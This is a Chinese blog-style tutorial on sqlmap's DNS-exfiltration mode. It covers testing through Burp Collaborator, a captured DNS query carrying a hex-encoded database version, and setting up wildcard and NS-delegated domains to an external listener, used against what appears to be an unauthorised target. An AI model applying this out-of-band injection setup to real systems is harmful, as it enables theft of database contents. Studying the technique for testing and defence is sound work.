網上針對sqlmap進行dns注入的相關文章太少,只是簡單介紹了下–dns-domain參數,相關的實戰文章要么就寫的模糊或者一筆帶過,搞的云里霧里(主要是菜,關鍵還沒大佬帶)。然后自己參考網上的方法自己重新搞了一遍。
需要準備的東西,sqlmap、windows盲注一個、兩個域名、一臺外網服務器。
某次搞事情的時候碰到一個時間盲注,碰巧是臺windows的,想起dns注入的方法。
在開始前我準備先用sqlmap的–sql-shell 命令進行dns注入payload的測試
先到burpsuite中的collaborator client中復制出burp給我們安排的域名
在利用sqlmap執行sql語句
Sqlmap還在跑的過程中burpsuite中已經接收到請求了。
352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.
中的352E362E3134就是執行version()后返回的結果。
解碼獲取到mysql的版本。好了至此這個點進行dns注入是沒毛病的。
準備配置域名2個,網上有些文章說一個也行,但是總感覺較為麻煩,很多域名服務器商也并未提供某些高級功能,所以還是準備兩個的簡單些。
www.a.com??
www.b.com
首先我們來配置域名a-> a.com
只需要添加*進行泛解析指向我們的外網服務器的ip就可以了。
在來配置我們的域名b->b.com
這個就更簡單了,直接修改域名的dns,就填入ns1.a.com ns2.a.com 就行了其他的都不用搞,照著填寫就行了。
然后等待域名生效。我們在到外網服務器上來測試下看是否解析成功
服務器上開始監聽53端口
然后本機ping hello.b.com 在外網服務器上發我們已經能接受到hello.b.com的請求,并且本機提示是找不到主機不用管,因為我們沒有設置解析。已經都配置完畢我們使用sqlmap進行dns注入即可。
Sqlmap中加入參數–dns-domain=b.com –hex即可
來到這一步sqlmap會卡住提示設置DNS服務器實例
直接ctrl+c
提示通過DNS通道的數據檢索成功。
注入的速度就跟報錯和聯合一樣快了,再也不用忍受龜速了。
